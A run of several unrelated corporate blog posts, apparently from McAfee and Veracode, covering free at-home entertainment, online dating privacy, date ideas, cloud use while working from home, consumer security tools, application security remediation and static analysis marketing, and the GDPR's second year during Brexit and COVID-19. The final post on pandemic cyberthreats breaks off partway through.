There’s one free resource for movies, music, and books that’s been around for some time—your public library. More recent is an excellent app for enjoying eBooks and audio books from your library on your phone or tablet, the Libby app. With this app you can access the thousands of books available at your library and enjoy them with a built-in reader and a built-in audio book player. The search functionality is quite nice too. It’s curated much like your movie queue, with sections dedicated to what’s new, what’s popular, and by topic, which is quite nice if you don’t have a particular book in mind. You can simply start exploring.

In all, the experience feels like you’re digitally exploring the shelves. Per their website, some 90% of public libraries in North America work with Overdrive, the service that powers the app, as well as libraries in some 78 countries worldwide. (You can search and see if your library works with the app right here.) All you need is your library card. Don’t have one? No problem. Many libraries allow you to get a card right inside the app. Likewise, you can visit your local library’s website for details on how to get one as well.

Play at Home

If anything, I’m continually inspired and a little blown away by the ingenuity people are showing now—particularly as we all look to keep connected and share experiences together while many venues are closed, at least for the time being. Case in point, Play at Home, where instead of watching a show, you can be the show. Play at Home offers up an entire series of short plays commissioned just for people to perform at home. And if you’re feeling particularly bold, they even have a few musicals too. They’re minutes in length, and they have plenty of family-friendly options too in their kid-friendly section which has “plays written to be performed by or for young people and to be enjoyed by humans of all ages.”

So, whether you perform in your living room or fire up a conference call to get some family and friends in on this, it’s an absolute departure from the normal movie night. Nice to know too is that this all started as a small group of five theatres looking to support artists during theatre closures, which has since expanded to 16 theatres and counting, including The Old Globe and the JFK Center for the Performing Arts.

The Shows Must Go On!

What a great name for a series of free musicals. Much like what the National Theatre has done, The Shows Must Go On! streams a new musical for free each Friday. Each one is a full-length performance and is available starting at 7pm BST (2pm ET, 11am PT, and 5am AET Saturday). Runs are limited, though. Just for 48 hours, which is just in time for the weekend. So far, there have been plenty of hits from Andrew Lloyd Webber, like Cats, Jesus Christ Superstar, and The Phantom of the Opera. And yes, it’s okay for you to belt one out and sing along while you watch. In fact, I encourage it.

Free nightly opera at the Met

Yet more performances are coming to your screen thanks to the New York Metropolitan Opera. This time, the performances refresh nightly as part of their Live in HD opera series. These will run for the duration of the Opera’s temporary closure, and you can plan your attendance ahead of time by checking out their weekly guide that provides capsule previews of each show. Puccini, Mozart, Gounod, Wagner, Verdi all have operas that make the grand stage, and while you may not find yourself singing along with these, the spectacle of a Met opera is something to behold. Also posted online are Playbills from the original performance dates, so you can indulge in the synopses, program notes, and more.

Play it (and stream it) safe

To be absolutely blunt about it, anytime you go searching for “free” anything, you’re bound to come across sketchy sites and links that prey on well-meaning people like you—particularly now. With folks keeping close to home, hackers and crooks have fine-tuned their scams accordingly. In fact, we have an entire research study that we’ve just conducted and are ready to share in a few weeks that shows how they’re taking advantage of streamers right now—and what you can do to play it safe when you’re simply looking to pass some time with a good show online.

In the meantime, go ahead and get yourself some protection that keeps you safer while you’re searching online. A good browser tool will alert you of any links and downloads that could wind up putting adware, spyware, or viruses on your device. Likewise, it can avert similar threats from misclicks and typos.

Stay Updated

To stay updated on all things McAfee and for more resources on staying secure from home, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post Entertainment #FromHome: What to do When You’re Bored at Home appeared first on McAfee Blogs.

Cracking the Code to a Successful Remediation Plan

Creating a remediation plan can be tricky. In fact, customers often tell us that it’s much easier to create a plan to help developers scan applications quickly and easily than it is to establish remediation goals. But if vulnerabilities aren’t remediated right away, there’s a higher chance that they will never be remediated.

Our recent State of Software Security (SOSS) report found that there’s about a 22 percent chance that a flaw will be fixed within a month of being discovered. If it’s not closed in the first month, the probability of remediation falls each month thereafter.

So what are some steps you can take to get started on a remediation plan for developers? First off, keep in mind that developers are responsible for more than just the security of their code; they are also responsible for the speed of deployments. This means that, just like security scans, remediation goals should be easy for the developer to follow, and they should take time and resources into account. Second, consider incorporating remediation best practices or tips that have been proven successful, like the list below.

Provide developers with plenty of time to remediate flaws.

Developers need to be testing early and throughout the software development lifecycle (SDLC), preferably with automated scans that are integrated into their existing tools and processes. If developers are scanning early, it will give them the time they need to remediate flaws. If they wait until the end of the SDLC, it will be expensive and time-consuming to remediate flaws, which could dissuade the developer from making the necessary fixes.

Train developers on secure coding practices and leverage tools that provide real-time feedback and remediation advice directly within the IDE.

Most computer science curricula do not include security. So, when developers join your organization, it’s important that they receive secure code training. By writing secure code from the start, there will be fewer flaws or vulnerabilities for developers to fix down the line. If possible, you should also leverage tools that provide developers with real-time feedback and remediation advice while they code, like Veracode’s IDE scan. Veracode’s IDE scan helps developers remediate faster and learn on the job through positive reinforcement, remediation guidance, code examples, and links to Veracode AppSec Tutorials.

Help developers prioritize flaws based on severity.

Not all flaws are created equal. Some flaws are simply informational and aren’t a real threat to an application, while other flaws are considered “High” severity and need to be remediated immediately. When giving a flaw report to developers, make sure to outline the criticality of the flaws discovered by mapping the flaws to possible exploitations, explaining what the exploit might mean to the business, and providing tips on what the developer can do to address – and reduce – the risks. For example, as stated in the Securosis report, Building an Enterprise DevSecOps Program, you might be able to remediate a critical application vulnerability in code, patch supporting systems, disable the feature if it's not critical, block with IDS or firewalls, or even filter with WAF or RASP technologies. Developers do not understand exposure analysis, so it’s difficult for them to differentiate the severity of vulnerabilities. For flaws that are deemed “High” or “Very High,” consider having the tools break the build so the flaws can’t go unaddressed. For flaws that are not a risk to the business, don’t be afraid to tell the developers to do nothing.


By working with developers to create a remediation plan, and incorporating the tips listed above, more flaws will be fixed, and your applications will be increasingly secure.

For additional information on working with developers to improve your AppSec program, check out our video, Tips for Unifying the Security Professional and Developer Roles.

Frequency, Speed, and Accuracy Are a Match Made in AppSec Heaven

“Make it work, make it right, make it fast.” These words from renowned software engineer Kent Beck will always ring true for developers, especially with the pace of development picking up, not slowing down. A GitLab survey from last year showed nearly half (43 percent) of respondents deploy software on-demand or multiple times per day – that’s nonstop grinding to produce good code. But simply writing good code is not enough. Software developers must work smarter and faster if they want to stay one step ahead of attackers and meet tight deployment timelines in the process.

Aside from looming deadlines and threat actors who don’t sleep, where is the disconnect? In our 10th annual State of Software Security report (SOSS X), we discuss how some developers follow LIFO (Last In, First Out) or FIFO (First In, First Out) methodologies for fixing security flaws that they find when they scan their code. While these methods may work for some organizations, our data paints a clear picture: the chance of a security flaw being fixed in the first month is only about 22 percent for most organizations. It drops to 10 percent for the second month, then 3 to 5 percent the longer teams wait to revisit said flaw.

With the LIFO method, some development teams are prioritizing newer flaws over older flaws, yet their age doesn’t matter in many cases; they’re all threatening in their own way. And with the FIFO method, new flaws may pile up as teams focus on the vulnerabilities that they discovered first by assuming they take precedence. These methods are lacking an essential step: prioritization.

Fixing the right flaws, fast

The better approach is to scan frequently and fix the right flaws fast as they appear on the radar. Data from SOSS X shows us that frequent scanners (300+) have 5 times less security debt than infrequent scanners. Additionally, frequent scanners see a 3 times reduction in median time to remediation (MedianTTR).

The key to this approach? A comprehensive AppSec solution that blends security testing into each stage of the development pipeline and automates tasks wherever possible. It means you’re giving development teams the right scan, at the right time, in the right place so they can keep working, learning, and improving their code without halting projects.


That’s where the Veracode Static Analysis family of solutions comes into play, with automated security feedback right in the IDE and the pipeline to improve code as developers work. It also conducts a full policy scan before your team moves forward to deployment, providing a clear window into the flaws that developers should be focusing on directly as well as an audit trail for compliance. Here’s a breakdown:

My code. Feedback in the IDE is fast, showing up immediately while developers code. Not only are they then finding and fixing flaws as they work, but they’re learning what to do differently next time to avoid the buildup of flaws (and security debt) down the road. The Veracode Static Analysis IDE Scan returns results in 3 seconds on average and offers guidance for remediation, code examples, and links to Veracode AppSec Tutorials too, encouraging developers to improve every step of the way.

Our code. Within a median time of 90 seconds, the Veracode Static Analysis Pipeline Scan runs on every build and offers code feedback at the team level. The feedback is fast, pointing out flaws that are introduced on new commits, and providing insight into when teams need to break the build to remediate policy-violating flaws. Even better: it’s easy for development teams to adopt and learn how to use, so it won’t slow them down.

Production code. The Veracode Static Analysis Policy Scan in the CD pipeline is the icing on the cake. It conducts a full assessment of the code in about 8 minutes, on average. This scan provides an audit trail to satisfy compliance needs and gives a clear picture of the overall health of your application. It runs without manual tooling on the Veracode Static Analysis Engine, and it even has an impressive false-positive rate of less than 1.1 percent.

When it comes to false positives, reducing the rate of these pesky alarms is critical to improving speed and developer poise. The industry-leading 1.1 percent false-positive rate (with no tuning required) from Veracode Static Analysis, which is verified by thousands of scanned applications and customer data, is a whole lot faster than our competition’s 32 percent false-positive rate. That accuracy means you’re giving developers back time they would otherwise spend chasing down false flags so that they can focus on what matters most to their team and to the organization.

Upping your AppSec game

Frequency? Check. Speed? Check. Accuracy? Check. Veracode Static Analysis checks all the boxes for improving the security and quality of developer code, and then some. Standardizing on one SaaS solution that leans on automation and easy integration means this isn’t just a pipe dream. It’s achievable – even amidst accelerated shifts to digital – and we’re pretty sure it would make Kent Beck proud.

Check out our whitepaper for more information on the Veracode Static Analysis family and how it can help you manage your AppSec risk in a world where frequency, speed, and accuracy matter most.

Online Dating #FromHome

Love finds a way. And that couldn’t be more true right now.

Even with so many singles keeping life close to home, dating apps have seen a big spike in downloads and usage. According to dating app Bumble, the end of March saw an 84% increase in the number of its video calls and voice chats. On March 29th, the Tinder dating app reported the highest number of swipes ever in one day—some 3 billion profiles got swept left or right. Should any of this surprise us?

Probably not. It only makes sense that people are turning to dating apps, as they’re designed to bring people together. So even though that may mean people can’t catch up in person, they still can catch up—at least virtually. And that’s important right now. We all know isolation from others isn’t easy, or healthy. There’s a good reason people are reaching out and making connections where they can.

How are people dating online right now?

I came across two articles on the topic the other day, both of which caught my eye—one from Time and another from Forbes. Even if you’re not dating, they’re both worth a read. Here’s what appears to be happening: people are pouring more hours into texting and video chatting on dating apps than before. Both articles offer plenty of anecdotes shared by daters, and whether or not they’re looking for a long-term relationship, they’re looking to talk. What remains to be seen is how this may change the face of online dating in the long haul for this industry that accounts for $6 billion in sales each year worldwide.

These trends got me to thinking, so this article is for you or anyone you know who may be hopping onto an online dating app like Match, Bumble, Plenty of Fish, eHarmony, Tinder, or OkCupid. Think of it as an advice column of a different sort, where we talk about dating in light of your online privacy and safety. 

Protecting your privacy while dating online

For starters, we have a couple of previous blogs that offer sound advice about online dating. The first covers ways you can protect your privacy when you’re using online dating apps, which starts with picking a dating app that has a good reputation. The second rounds out the topic with further online dating advice for adults and teens alike. Give them a look!

Go into dating feeling confident and secure.

Now for my two cents on the topic. It starts with basic hygiene. Digital hygiene, that is. Before you dive into a dating app, ensure that your device (and all your connected devices while you’re at it) has a comprehensive security solution in place. As you surf, chat, and meet up online, you’ll want to know that you’re protected against malware, viruses, phishing attacks, sketchy links, and so forth. Other features will come in handy (and be necessary as well), like ones that help you manage your passwords, protect your identity, safeguard your privacy, and more—all of which we’ll talk about in a bit.

Pick a winner

Picking the right app is like picking the right date. From a security standpoint, these apps are the keepers of highly personal information about you, so you’ll want to know how they handle data, what privacy protections are in place, and what information they gather when you first sign up and what they continue to gather as you use the app. Do your research. Read up on their privacy policies. See what other people have to say about their experiences. And get a sense of what the app is all about. What’s its approach to dating? What kind of relationships are they focusing on? Make sure all of it feels right to you. 

Don’t get too personal

Only give the app the information that’s absolutely necessary to sign up. Dating apps ask questions so that they can help you find an ideal match, yet only share what you feel comfortable sharing. This is true from a personal standpoint, but it’s true from a security standpoint too. Anything you share along those lines could be at risk of a hack or a breach, the likes of which were reported by Wired and Forbes last year. If your info is compromised, it could lead to anywhere from identity theft to harassment, so when you use a dating app, keep the sharing to a minimum—and keep your eyes peeled for any suspicious activity across your social media, online accounts, and even your finances.

Passwords are your pal

Another password to remember! That’s just what you need, right? Right! It absolutely is, and a strong one is vital. You can create one and manage all of your passwords with a password manager like the True Key app. It’s free, and it’ll encrypt your passwords and use multi-factor authentication, which offers even further protection from hacks and attacks on your account.

Use a VPN for extra privacy

You can help keep your chats more private, and just about anything else you're doing online, by using a VPN (virtual private network). For example, our VPN uses bank-level encryption to keep your personal data and activities private from hackers on the network you're connected to. Anything you send while you're online, like personal details or credit card numbers, is encrypted between your device and the VPN server, so someone sharing your Wi-Fi can't read it. Keep in mind that a VPN protects data in transit; it doesn't hide what you hand to the dating service itself, which is why the advice above about sharing less still applies. Given the security risks we've talked about so far, you'll want to look into a VPN.

Use caution with public Wi-Fi

If you're not using a VPN on your device, don't use your dating app on public Wi-Fi. The issue is this: plenty of public Wi-Fi hotspots aren't secure. Someone else on the network could intercept anything you send over it that the app doesn't already encrypt, which can include your passwords, any photos you share, and any chats you have. In other words, using public Wi-Fi without protection is like opening a door that leads right to you and your most personal data. This applies to everything on public Wi-Fi, not just dating apps. If you use public Wi-Fi at all, you really should use a VPN.

Dating outside the app

There's a pretty good chance that you have a video conferencing app or two available to you. You're not alone. Market data agency App Annie reported that one video conferencing app saw downloads in Italy increase by nearly 425 times their previous average in March and by more than 2,300 times their previous average in Spain. Meanwhile in the UK, France, and Germany, the top video conferencing apps saw downloads increase by 11 to 30-fold during the same time.

If you're thinking about using one of these to do a little dating outside of a dating app, or if you're just using one to keep up with family and friends, the advice here is do your research. Find out how secure they are and what privacy policies they have in place, particularly as some have experienced security issues as of late. For more, check out my recent article on video conferencing so you can help keep hackers and party crashers at bay when you're chatting.

For example, look for one that uses end-to-end encryption so that the conference is protected from prying eyes and so that others can’t intrude upon the conversation uninvited. Look for articles from reputable sources too, like Consumer Reports, as there have been further reports of privacy issues where certain user information has been shared with third parties while using the video conferencing tool. 

In all, we’re leaning on technology so much more heavily right now and online dating is just one more instance of that. While online dating isn’t new, how we’re using it from home is, at least in a few ways. However you, your friends, or family go about that, be safe and have fun!

Stay Updated 

To stay updated on all things McAfee and for more resources on staying secure from home, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.


The post Online Dating #FromHome appeared first on McAfee Blogs.

Date Night #FromHome Ideas

Date Night #FromHome ideas

“So, what movie should we watch?” The dreaded question. Twenty minutes of “mmm, maybe” later, you settle on an old episode of “The Office” and call it good. 

If that sounds a little too familiar, this post is for you. With so many of us having date night at home, now seems like a good time to throw out a few other options that look beyond streaming TV and movie queues. I chatted with a few friends, did a little looking around on the web, and came up with a few ways you and your loved one can hang out, chat, and simply settle into a great evening together.  

Bake Stuff, Make Stuff, Do Stuff

Verbs like bake, make, and do are a great place to start. Even at home, there are plenty of ways to get active together. A little searching online will turn up a number of ideas, as numerous websites and brands are offering all kinds of free content that can get you moving and doing things. (Related, if the two of you want to learn a language or take a class together, check out my previous article on personal and professional development from home.) Here are a few ideas:

25 Goodies You Can Bake Together

Hop into the kitchen, crank up some tunes, and whip up some comfort food, like cheesecake-stuffed chocolate chunk banana bread muffins or some cinnamon sugar apple cake. This article from Huffpost has those recipes and more, which are bound to taste even better when you bake them together.

Take a Photography Class Together

Practically all of us have a camera thanks to our phones, and as of this writing Nikon is offering their photography classes for free at Nikon School Online. While some of the classes focus on some of their cameras and equipment, they also have general courses on photographing kids and pets, photography fundamentals, and macro photography too.

Work Out Together

Quite on the other end of the spectrum from movie night is workout night, or afternoon, or whenever. Grabbing a workout is not only great for your body, it’s great for your head. Life Time has all kinds of workouts available for free online, including cardio, strength, and yoga for all levels. There are even some family courses too.

Wind Down Together with Some Yoga

Yoga with Adriene is great. She's been featured in numerous fitness blogs and her YouTube channel has well over 7 million subscribers. Check out her free yoga sessions. Her approach is quite unique, with sessions built not only around fitness goals, but moods and headspaces as well. Sessions range anywhere from 5 to 45 minutes, with plenty of options for beginners, so you can take your pick.

Virtual Museum Tours

Okay, so nothing beats the real thing. But it’s nice to know that even if some of the world’s greatest museums are closed right now, we can take some pretty amazing guided tours on our laptops or tablets together. Here are just a few of the many—a simple search for virtual museum tours will turn up plenty.

Tour the Louvre

The Louvre, expansive as it is, hosts not one but seven different virtual tours of its museum. The virtual tour page for the Louvre offers a number of exhibitions, along with a virtual tour of Egyptian antiquities and several other online resources for exploring its collections.

Go to the Guggenheim

The two of you can virtually stroll along the Guggenheim’s famous spiral walkway and take in its Impressionist, Post-Impressionist, and Contemporary art along the way. The museum has further options for the two of you to explore its collections and history from home here on the “Guggenheim from Home” page as well.

Check Out Rembrandt, Dali, and More in Spain

The website for Madrid's Thyssen-Bornemisza Museum houses 87 virtual tours (yes, 87!) featuring greats like Gauguin, El Greco, Van Gogh, along with the work of American Impressionists, Pop artists, Surrealists, and more.

Step Inside Air Force One and 11 Other Famous Planes

Seattle’s Museum of Flight currently hosts the first presidential jet plane, a Boeing 707-120, delivered for President Eisenhower, which you can visit as part of the flight museum’s 3D tours. It’s one of the many classic planes you can climb inside, along with NASA’s Space Shuttle trainer. The site is loaded with galleries

Unplug with Game Night

If you want to get away from screens entirely, game night provides a great escape—and plenty of time to simply sit together, chat, and laugh as you play. We have plenty of gamers here at McAfee, who are among the many who have revitalized tabletop gaming in recent years by looking for fresh ways to connect with friends and family after a screen-heavy day. 

If you haven’t picked up a board game in ages, “game night” might conjure up sessions of Monopoly or Clue. That’s changed. The games that today’s designers have whipped up during the recent renaissance will come as a surprise—and offer you two some together time. 

Azul

This one is beautiful. Inspired by the Moorish tiles of Portugal, Azul is a game of pattern placement with wonderfully wrought tiles of its own. Completing specific patterns and sets racks up points but wasted tiles “fall to the floor” and cost you points in return. It’s tactile, colorful, and lends itself to conversation. You can knock out a game in 45 minutes or less and it plays great with two people.

Lost Cities

Take a head-to-head card game, an adventurous archeological expedition theme, and mix it in with quick-playing rules that are easy to teach, and you get Lost Cities. It’s an excellent game for couples because there’s just enough suspense and strategy to the play to make it fun—but not so deep that you find yourself sitting in silence. It pairs well with your favorite music and relaxing beverage of choice.  

Ticket to Ride

If you like a little more competition in your games, this game of building a railway empire in 19th Century North America might be your thing. Ticket to Ride (and its many spin-offs) is another game that you can learn in about 15 minutes, where you build routes that connect cities for quick points (like Los Angeles to Phoenix) and then string together stretches of connections for even bigger points (like Los Angeles to New York).

Carcassonne

Modeled after the bucolic vistas of southern France, Carcassonne is a tile placement game where players collectively build a landscape full of cities, fields, roads, and cloisters—and claim points as they’re completed. It’s almost like a puzzle that you build together, with lots of strategy and risk-taking along the way. Half the fun is watching the map take shape as everyone takes their turn, and no two games end up looking alike.

On a side note, it may be tough to go shopping in your area right now. However, many local game stores and game cafes support online shopping, which is a fine opportunity to support a small business in your area. Likewise, you can find these and other games at larger online game stores and ecommerce retailers.

Playing It Safe When You Plug Back In

Whenever you hop online for that cooking class, workout, or tour, consider using protection that keeps you safer while you're surfing, so you can steer clear of sketchy links, misclicks, typos, or bad downloads that could drop adware, spyware, or viruses on your device. Likewise, if any of these ideas lead you to a quick online shopping trip, take a moment to brush up on your security smarts with our latest article about online shopping scams and how to avoid them.



The post Date Night #FromHome Ideas appeared first on McAfee Blogs.

Working from Home in 2020: How Cloud Use Changed

2020 has been a tumultuous year, with health and economic stability shattered for most of the world in just months. For those in a fortunate position to do so, working from home has become the new norm, and will likely be for the foreseeable future. Major companies in the tech sector have cemented the practice, with Google for example announcing that its global workforce can remain home until the end of the year. Twitter was the first to announce that employees can work from home forever, if that is their preference.

It is a sign of our times and technological development that this is possible. The pace of development for cloud services met this moment near-perfectly. Over the past few years, we’ve reached a critical mass of businesses and employees who are ramped up and comfortable using collaboration services like Zoom, Webex, Slack, and Microsoft Teams. Storage apps like Box and collaboration suites like Microsoft (Office) 365 have largely replaced the software, thumb drives, and network storage we used to manage files.

All of these services made our shift to working from home possible, and seamless for many. Companies that hadn’t ramped up yet on cloud-based collaboration and productivity apps are now on their way.

As a global provider of cloud security technology, we have a unique view into the use of cloud services and the threats companies face in the cloud. Using anonymized and aggregated metadata, we can derive trends across our vast base of 30 million enterprise cloud users. The shift to working from home was a catalyst for us to dive into this data and uncover trends in how the world changed.

All of these findings are in our new report, the Cloud Adoption and Risk Report: Work from Home Edition. Grab the full copy below if you want to skip the preview here and go straight to the full set of findings.


First, use of all cloud services from every industry grew 50% overall from the start of 2020. However, some industries had to undergo more changes than others to enable working from home:

Manufacturing and education increased their cloud use by 144% and 114% respectively. Every parent of school-aged children has felt the shift in education practices over the past few months, with much of the burden falling to them to set up virtual classrooms or even teach their kids themselves. Manufacturing may be playing catch up, with fewer in-person meetings requiring immediate replacement by cloud-based tools.

Of all categories, collaboration services saw the largest increase in usage, up several hundred percent across the board. We all watched as the world restructured their social lives around Zoom, while enterprises increased their use of Webex even further, and ramped up on Slack and Teams to keep collaboration alive from a distance.

This increase in cloud use, particularly in collaboration services, correlates directly with more data being stored in the cloud. We monitored not only these increases in service use, but also a new wave of threats targeting the wave of data entering the cloud.

We’ll dive into our threat research in part 2 of this series. To see our threat analysis before that blog is released, download the full report now.


The post Working from Home in 2020: How Cloud Use Changed appeared first on McAfee Blogs.

Cool and Helpful McAfee Tech to Help Secure Your Online Life

These days, we're all actively engaging online. Whether it's my kids scrolling through social media, my wife video chatting with her friends and online shopping, or me checking my emails, we're all leveraging the devices in front of us to keep our lives moving forward.

What many people don’t realize is that there are technologies that we can implement into our daily online routines that will not only help us achieve our digital tasks more effectively but safeguard our privacy as well. If there’s a way I can browse the internet more quickly and securely than before, I’m here for it!  

Tools Anyone Can Use

There are a lot of free and easy-to-use technologies out there that can benefit you – you just need to learn what they are first! With that, let’s explore cool technologies that not too many people may know about, which can positively impact your online life.  

Safe Browsing Solutions

The internet is a vast sea of content, both good and bad. And we're all navigating that sea to learn, work, and socialize online. But when you're trying to browse as efficiently as possible, it can be tricky to tell the safe websites from the suspicious ones. That's where a security solution like McAfee® WebAdvisor comes into play.

McAfee® WebAdvisor can help keep you safe from online threats like malware and phishing attempts while you surf the web. For example, the tool places a checkmark next to all the safe links, making security decisions much easier for the everyday internet user, like my wife when she’s on a mission to shop online. And it is free too! 

Virtual Private Network (VPN)

Even the average internet surfer like you and me should consider using a Virtual Private Network (VPN), as it essentially allows you to send and receive data across a public network as if it were a private network. A VPN encrypts, or scrambles, your information between your device and the VPN server so others on the network can't read it, helping to safeguard your data. VPNs are especially handy for when you are working remotely, if you want full access to the internet while you're traveling, or if you simply want to protect your privacy. McAfee® Safe Connect is a great and affordable option (with a limited free version available too) for users who are looking for a solution that is not only easy to implement, but one that also provides bank-grade encryption and private browsing to protect all online activities.

Password Managers

Speaking of pesky passwords, another way to easily secure your online accounts is with a password manager. A password manager can help you create strong passwords, remove the hassle of remembering numerous passwords, and log you on to websites automatically. Who says staying secure has to be complicated? 

While many password managers are free, it's important that users do their research and adopt password managers from companies they trust. Another option? Some password managers also come included in a comprehensive security solution, like McAfee® Total Protection.

Robocall Blocking Apps

At one time or another, you’ve probably experienced a mysterious phone call from an “Unknown Caller.” If you’ve ever actually bothered to pick up one of these calls, you’ve likely heard a strange, robotic voice on the other end claiming to be from a certain organization or asking you to take action. Whether the call itself is just annoying or is coming from a criminal looking to scam consumers out of cash or information, one thing is certain – robocalls are a huge headache.  

Unfortunately, these pesky phone calls have shown no signs of slowing down. In fact, it was recently reported that robocall scams surged to 85 million globally, up 325% from 2017. Luckily there are multiple robocall blocking apps and tools users can adopt to avoid phone spam. Additionally, you can register on the FTC's National Do Not Call Registry, which cuts down on legitimate telemarketing calls; scammers ignore the list, so a blocking app is still your main defense against them.

Multi-Factor Authentication

If you read my previous blog, you know that many of the common password habits that we use can lead to multiple security concerns. That said, passwords are just the first line of defense when it comes to securing online accounts – so what happens if a hacker makes it through that security barrier? Enter two-factor or multi-factor authentication.  

These days, most people have heard of two-factor authentication. To put it simply, the tech utilizes two checkpoints to verify the user's identity. These are typically something you know (your password), plus something you have (a one-time password texted to your smartphone or generated by an authenticator app) or something you are (a fingerprint scan or facial recognition). Answers to security questions are sometimes offered as a second step, but they're just another "something you know," so they add far less protection than a code or a biometric. While two-factor authentication is a great starting point, there's also multi-factor authentication, which, as it sounds, means a user must address multiple types of proof points before gaining access to an account or device. In fact, multi-factor authentication is becoming more and more intuitive thanks to artificial intelligence, as it can select a combination of authentication factors based on a user's risk profile and habits.

This technology is easy to integrate into your life, as it's often a simple add-on to a lot of the things we already own. For example, Face ID on your iOS phone or the fingerprint reader on your Android phone can stand in for your passcode when you unlock the device, and when an app or account asks for that same biometric on top of your password to approve a sign-in, you've got two-factor authentication.

Tools for Current McAfee Subscribers

Are you currently subscribed to McAfee® Total Protection or McAfee® LiveSafe? If so, there might be some cool tools within these solutions that you aren’t taking full advantage of that can help boost your security and improve your online experience. The more you know, right? 

For example, if you are a current McAfee® LiveSafe subscriber, you automatically have access to McAfee's secure VPN and McAfee File Lock. If you are currently subscribed to McAfee® Total Protection, you have access to a whole host of security tools including a password manager and VPN. Additionally, McAfee® Total Protection gives you access to McAfee® Identity Theft Protection, which is a great tool for monitoring fraud. Finally, if you're looking to delete some sensitive files, you can use McAfee® Shredder™ to completely ensure that no traces are left behind. By employing the full range of these tools, current McAfee subscribers can take their security to the next level and surf the internet without missing a beat.

Cool Tech, Stronger Security

By taking advantage of these free, existing, and easily accessible tools, you can both improve every facet of your online life, whether that means social interactions, online shopping, or sending emails, and keep your information secure. You can have fun online and easily integrate security into your day-to-day which, in my opinion, is a win-win.


The post Cool and Helpful McAfee Tech to Help Secure Your Online Life appeared first on McAfee Blogs.

The GDPR, Year II

With children, reaching the age of two is usually the change from a beautiful newborn to a moving creature that has reached the terrible twos.

It may be that the same is happening to the General Data Protection Regulation as it approaches the mark of its second year of enforcement: Data Protection Authorities (DPAs) seem to be paralyzed by limited budgets and a lack of resources, and most DPAs consider that the GDPR is not fully enforced. The Brave report issued by the Brave Community, a forum where people who care about the internet and their browsing experience come to discuss with each other, shows that only five of Europe's 28 national GDPR enforcers have more than 10 tech specialists. Half of EU GDPR enforcers have limited budgets (under €5 million), leading advocates to believe that European governments have failed to properly equip their national regulators to enforce the GDPR. Recently, Brave even called on the European Commission to launch an infringement procedure against EU Member State Governments for failing to implement Article 52(4) of the GDPR, which provides that "Each Member State shall ensure that each supervisory authority is provided with the human, technical and financial resources, premises and infrastructure necessary for the effective performance of its tasks and exercise of its powers […]".

Beyond enforcement challenges, the GDPR has gone through some major crises: first with Brexit and then with the outbreak of the COVID-19.

Though terrifying for many people, Brexit was handled relatively easily through a transition period, which goes until 31st December 2020, during which UK organisations are bound by two laws: the EU GDPR and the UK DPA (Data Protection Act 2018).

The EU GDPR will no longer apply directly in the UK at the end of the transition period. However, in reality, the Data Protection, Privacy and Electronic Communications (Amendments etc.) (EU Exit) Regulations 2019 amends the DPA 2018 and merges it with the requirements of the EU GDPR to form a data protection regime that will work in a UK context after Brexit, and with insignificant differences between the EU GDPR and the proposed UK GDPR. In short, organisations that process personal data should continue to comply with the requirements of the EU GDPR and doing so will meet the obligations in the UK as well. The only thing left to consider is to what extent the EU Commission will issue an adequacy decision in favour of the UK.

The second major crisis is the COVID-19 pandemic, which presented new challenges, among them new tracing apps, the explosion in remote working at controllers, processors, and sub-processors, and questions about how employers ensure the health and safety of their workforce without compromising data subjects' privacy rights. Additionally, the sudden "mass exodus" to working from home has created (personal) data protection risks, and hacker activity has been unprecedented. "It's like we've kicked over a hornet's nest," says Raj Samani, chief scientist at McAfee.

Data breaches are not limited to the ones resulting from hackers; they can also result from a simple data loss, such as a misplaced corporate USB stick. Remote working weakens IT security for unprepared companies; vendors in some jurisdictions and in some roles did not have infrastructure in place to properly continue to offer their services after stay-at-home orders. With respect to devices and software, the risks include:

    • using inadequately secured private or mobile devices (lack of antivirus software, out-of-date operating system software, no encryption solutions, etc.) or using an unsecured Wi-Fi network;
    • using popular free messaging and meeting applications;
    • using social media platforms for business purposes;
    • not using VPN and other corporate solutions;
    • having no back-up plan;
    • lack of video surveillance
    • the proliferation of other people, Siri, Alexa, and other listening/sensing devices in the home.

With respect to physically securing data

  • risk of loss during transfer of documents;
  • not adapting space at home for remote work purposes, making it possible to damage equipment or have sensitive documents stolen.

With respect to the organization

  • having no fundamental business continuity measures in place and having no back-up equipment;
  • low employee awareness, since training on personal data protection previously focused on the risks present in the normal workplace.

The threats are numerous, but mitigating the risk is not impossible and can still be done:

  • Draft (or update) a remote work policy and make sure there are processes around remote working. This might be a part of an existing Acceptable Use Policy or it might be a standalone document.
  • Inform your employees of the minimal security requirements for devices and networks they use, and have technical measures to ensure that your workforce is adhering to these requirements.
  • Limit your employees to sanctioned messaging and meeting software and train your employees about how many popular applications may not provide for an adequate level of data protection and are usually not intended for business purposes.
  • Train your employees about why privacy and security are important generally.
  • Make sure the devices use the latest antivirus software and that employees have a VPN solution available when required by policy or their activities.

COVID-19 has marked the end of the world as we knew it before. Our lives may be impacted forever with new work styles, unprecedented cybersecurity issues, innovative policies, new hygiene rules and so on. The fight against COVID-19 is not just for the organisation, employees or customers but a joint effort from everyone. Obviously, organizations will need to rethink their cyber risk management post COVID-19 and should not forget, along the road, the rules and the framework set by the GDPR whilst rebuilding the world after.

The GDPR has proved to be a robust tool to guide companies, officials and public health authorities in the response to the COVID-19 crisis. Allocating increased financial and human resources to the DPAs across the EU will allow them to address the large number of complaints, whilst it is up to the European Commission to ensure no fundamental rights are violated.


The post The GDPR, Year II appeared first on McAfee Blogs.

Cyberthreats During the Pandemic Are on the Rise

With the sudden shift to digital that many businesses are facing in response to the pandemic, preventing cyberattacks is more important than ever. According to the FBI, attacks related to COVID-19 have increased 400 percent in recent months. And with data from Gartner showing that 74 percent of companies expect to maintain some level of remote workforce indefinitely, organizations can't risk faltering when it comes to the health of their application security, both for their own business continuity and for the safety of their customer data.

The World Health Organization (WHO), which saw a staggering fivefold increase in attempts to target its own staff in April, warns that businesses and the general public alike are at an increased risk for email phishing attacks, which we know often go hand in hand with spoofing attacks. But it doesn't stop there; malicious actors continue to exploit every angle possible, from brute force threats to manipulating services meant to help the general public. Businesses must be vigilant about how they're handling security in this new normal, especially when issues with remote work arise.

The remote access conundrum

Chris Wysopal, Veracode's co-founder and CTO, believes there may be even more risk on the horizon as organizations continue remote work through the course of the pandemic.

